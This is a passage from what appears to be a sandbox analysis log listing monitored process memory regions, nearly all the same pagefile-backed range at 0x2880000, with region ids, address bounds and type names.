1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11927 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11928 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11929 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11930 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11931 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11932 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11933 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11934 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11935 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11936 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11937 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11938 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11939 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11940 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11941 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11942 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11943 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11944 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11945 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11946 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11947 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11948 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11949 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11950 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11951 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11952 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11953 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11954 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11955 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11956 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11957 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11958 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11959 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11960 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11961 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11962 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11963 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11964 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11965 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11966 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11967 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11968 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11969 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 11970 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 11971 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11972 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11973 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11974 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11975 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11976 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11977 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11978 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11979 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11980 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11981 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11982 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11983 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11984 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11985 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11986 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11987 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11988 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11989 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11990 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11991 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11992 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11993 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11994 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11995 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11996 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11997 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11998 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11999 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12000 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12001 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12002 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12003 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12004 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12005 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12006 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12007 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12008 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12009 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12010 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12011 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12012 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12013 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12014 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12015 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12016 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12017 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12018 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12019 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12020 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12021 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12022 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12023 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12024 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12025 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12026 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12027 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12028 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12029 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12030 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12031 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12032 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12033 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12034 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12035 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12036 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12037 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12038 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12039 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12040 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12041 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12042 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12043 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12044 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12045 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12046 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12047 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12048 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12049 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12050 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12051 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12052 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12053 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12054 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12055 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12056 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12057 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12058 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12059 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12060 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12061 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12062 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12063 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12064 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12065 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12066 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12067 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12068 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12069 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12070 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12071 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12072 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12073 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12074 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12075 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12076 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 12077 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 12078 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12079 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12080 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12081 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12082 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12083 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12084 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12085 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12086 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12087 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12088 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12089 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12090 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12091 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12092 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12093 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12094 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12095 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12096 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12097 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12098 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12099 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12100 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12101 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12102 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12103 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12104 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12105 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12106 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12107 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12108 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12109 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12110 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12111 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12112 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12113 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12114 start_va = 0x2880000 end_va = 